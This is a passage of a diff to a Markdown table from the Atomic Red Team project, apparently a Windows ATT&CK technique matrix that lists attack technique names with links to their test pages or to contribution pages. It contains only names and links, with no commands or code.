-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1551.005/T1551.005.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
